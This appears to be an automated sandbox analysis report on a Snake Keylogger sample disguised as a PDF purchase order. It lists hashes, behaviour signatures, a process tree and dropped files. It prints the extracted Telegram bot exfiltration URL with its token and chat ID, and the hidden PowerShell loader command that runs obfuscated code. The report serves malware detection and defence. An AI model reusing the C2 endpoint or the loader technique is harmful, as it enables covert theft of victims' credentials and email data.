Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-11-2024 08:59

General

  • Target

    PO#940834894039430849484803408.PDF.exe

  • Size

    793KB

  • MD5

    c87c5a7ad95494abcb368fbfbe5508fd

  • SHA1

    0e33726a7647be3c9753240857c4cdfaf7a4b851

  • SHA256

    b9bc7b1adca24293d38533d4af80b11fd24df9e28b1271f508f3047884b869bf

  • SHA512

    1d45aabe8e0855f76c6b3a894b35480783f4f9fcde665dc08d90ae43c84962d9cf02971199718fa57a10711b808b16220a76cb3811c25501905380d4887444b9

  • SSDEEP

    24576:mMwhYkaCzmb6f2b/hNZx0PARxFWfcFqal/F4X5Zi:mMwh0Omb7PZq+WfQiX5

Malware Config

Extracted

Family

snakekeylogger

C2

https://api.telegram.org/bot8040460346:AAFN58T9Y0-aqdzScEiebBO06S141L8RsSA/sendMessage?chat_id=6680692809

Signatures

  • Snake Keylogger

    Keylogger and Infostealer first seen in November 2020.

  • Snake Keylogger payload 2 IoCs
  • Snakekeylogger family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\PO#940834894039430849484803408.PDF.exe
    "C:\Users\Admin\AppData\Local\Temp\PO#940834894039430849484803408.PDF.exe"
    1⤵
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2276
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden "$Aerobated=Get-Content -Raw 'C:\Users\Admin\AppData\Local\Temp\haandbog\Wambles\Firtallene.Kon';$omdigtnings=$Aerobated.SubString(53429,3);.$omdigtnings($Aerobated)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2524
      • C:\Windows\SysWOW64\msiexec.exe
        "C:\Windows\SysWOW64\msiexec.exe"
        3⤵
        • Accesses Microsoft Outlook profiles
        • Blocklisted process makes network request
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • outlook_office_path
        • outlook_win_path
        PID:3220

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wqpdrlm1.d0x.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\haandbog\Wambles\Firtallene.Kon

    Filesize

    52KB

    MD5

    3bc6283487e6d24c936852451b413c2a

    SHA1

    8217f7a25aadbe7b9f081d045b6899ef3df052fd

    SHA256

    61f5a6c21629c953a1759b9f51f6abfcf11e7e4e2d3defe593871f20d1e0715d

    SHA512

    1b94fe5a7869e223f21b5985fdb8a61bc90b8f4a4be5704ba6008b62f30710fd0da4c34f974d00bb566dee791b6fec41572be06074a6db80c39a46e6757aba2a

  • C:\Users\Admin\AppData\Local\Temp\haandbog\Wambles\Overmast224.Jdi

    Filesize

    352KB

    MD5

    d3e916ba37b993f859d3df7b04ad65c5

    SHA1

    6f6ba3701e601c3b27bb1274b93d36e7b39b84b1

    SHA256

    a4ceb200f51d0257fa702196bb751df7786dd7c1b7fbcc814a8fee61972192e9

    SHA512

    fe5c5d60abdbfbe77cd77ac7a0c7524d0af907940cd8e8156fb9419ac32ffce13e7cc3218c6ccee813539a7a02460af2640bac76729a2d120196f7a4501ada82

  • C:\Users\Admin\AppData\Local\orts.lnk

    Filesize

    1KB

    MD5

    15746df1f05bf30d090e474519f1a8d5

    SHA1

    7972dd3c8f82424d30b1daf0e7923ed6d32becfd

    SHA256

    6bedfcf867b9004beaef9182c38a8c1869c5adcff585fb8b34647a4e85380837

    SHA512

    27fe92346dd52dc9aceb9a41b1757a8be6778ccb381d8990d7322f30febb3f55da3f5d0f8c94725cdee567075aebd1e1c2d3b9e7f9e65d72b588fc351859eb55

  • memory/2524-186-0x0000000073CF0000-0x00000000744A0000-memory.dmp

    Filesize

    7.7MB

  • memory/2524-201-0x0000000008FA0000-0x000000000DBC1000-memory.dmp

    Filesize

    76.1MB

  • memory/2524-150-0x0000000005710000-0x0000000005732000-memory.dmp

    Filesize

    136KB

  • memory/2524-188-0x0000000073CF0000-0x00000000744A0000-memory.dmp

    Filesize

    7.7MB

  • memory/2524-153-0x0000000005820000-0x0000000005886000-memory.dmp

    Filesize

    408KB

  • memory/2524-148-0x00000000058B0000-0x0000000005ED8000-memory.dmp

    Filesize

    6.2MB

  • memory/2524-159-0x00000000060A0000-0x00000000063F4000-memory.dmp

    Filesize

    3.3MB

  • memory/2524-165-0x00000000067E0000-0x000000000682C000-memory.dmp

    Filesize

    304KB

  • memory/2524-164-0x0000000006740000-0x000000000675E000-memory.dmp

    Filesize

    120KB

  • memory/2524-167-0x0000000006C70000-0x0000000006C8A000-memory.dmp

    Filesize

    104KB

  • memory/2524-166-0x0000000006CC0000-0x0000000006D56000-memory.dmp

    Filesize

    600KB

  • memory/2524-168-0x0000000007710000-0x0000000007732000-memory.dmp

    Filesize

    136KB

  • memory/2524-169-0x0000000007CF0000-0x0000000008294000-memory.dmp

    Filesize

    5.6MB

  • memory/2524-149-0x0000000073CF0000-0x00000000744A0000-memory.dmp

    Filesize

    7.7MB

  • memory/2524-171-0x0000000008920000-0x0000000008F9A000-memory.dmp

    Filesize

    6.5MB

  • memory/2524-173-0x0000000070180000-0x00000000701CC000-memory.dmp

    Filesize

    304KB

  • memory/2524-174-0x0000000073CF0000-0x00000000744A0000-memory.dmp

    Filesize

    7.7MB

  • memory/2524-190-0x0000000008450000-0x000000000847A000-memory.dmp

    Filesize

    168KB

  • memory/2524-175-0x0000000070920000-0x0000000070C74000-memory.dmp

    Filesize

    3.3MB

  • memory/2524-185-0x0000000007BC0000-0x0000000007BDE000-memory.dmp

    Filesize

    120KB

  • memory/2524-147-0x0000000003120000-0x0000000003156000-memory.dmp

    Filesize

    216KB

  • memory/2524-187-0x0000000007BE0000-0x0000000007C83000-memory.dmp

    Filesize

    652KB

  • memory/2524-152-0x00000000057B0000-0x0000000005816000-memory.dmp

    Filesize

    408KB

  • memory/2524-189-0x0000000007CD0000-0x0000000007CDA000-memory.dmp

    Filesize

    40KB

  • memory/2524-172-0x0000000007B80000-0x0000000007BB2000-memory.dmp

    Filesize

    200KB

  • memory/2524-191-0x0000000008480000-0x00000000084A4000-memory.dmp

    Filesize

    144KB

  • memory/2524-192-0x0000000073CF0000-0x00000000744A0000-memory.dmp

    Filesize

    7.7MB

  • memory/2524-195-0x0000000073CF0000-0x00000000744A0000-memory.dmp

    Filesize

    7.7MB

  • memory/2524-194-0x0000000073CFE000-0x0000000073CFF000-memory.dmp

    Filesize

    4KB

  • memory/2524-196-0x0000000073CF0000-0x00000000744A0000-memory.dmp

    Filesize

    7.7MB

  • memory/2524-146-0x0000000073CFE000-0x0000000073CFF000-memory.dmp

    Filesize

    4KB

  • memory/2524-198-0x0000000073CF0000-0x00000000744A0000-memory.dmp

    Filesize

    7.7MB

  • memory/2524-199-0x0000000073CF0000-0x00000000744A0000-memory.dmp

    Filesize

    7.7MB

  • memory/2524-200-0x0000000073CF0000-0x00000000744A0000-memory.dmp

    Filesize

    7.7MB

  • memory/2524-151-0x0000000073CF0000-0x00000000744A0000-memory.dmp

    Filesize

    7.7MB

  • memory/2524-202-0x0000000073CF0000-0x00000000744A0000-memory.dmp

    Filesize

    7.7MB

  • memory/2524-203-0x0000000073CF0000-0x00000000744A0000-memory.dmp

    Filesize

    7.7MB

  • memory/2524-205-0x0000000073CF0000-0x00000000744A0000-memory.dmp

    Filesize

    7.7MB

  • memory/3220-207-0x0000000000B00000-0x0000000000B26000-memory.dmp

    Filesize

    152KB

  • memory/3220-206-0x0000000000B00000-0x0000000001D54000-memory.dmp

    Filesize

    18.3MB

  • memory/3220-208-0x0000000024730000-0x00000000247CC000-memory.dmp

    Filesize

    624KB

  • memory/3220-210-0x0000000025380000-0x00000000253D0000-memory.dmp

    Filesize

    320KB

  • memory/3220-211-0x00000000255A0000-0x0000000025762000-memory.dmp

    Filesize

    1.8MB

  • memory/3220-214-0x0000000025470000-0x0000000025502000-memory.dmp

    Filesize

    584KB

  • memory/3220-215-0x00000000253D0000-0x00000000253DA000-memory.dmp

    Filesize

    40KB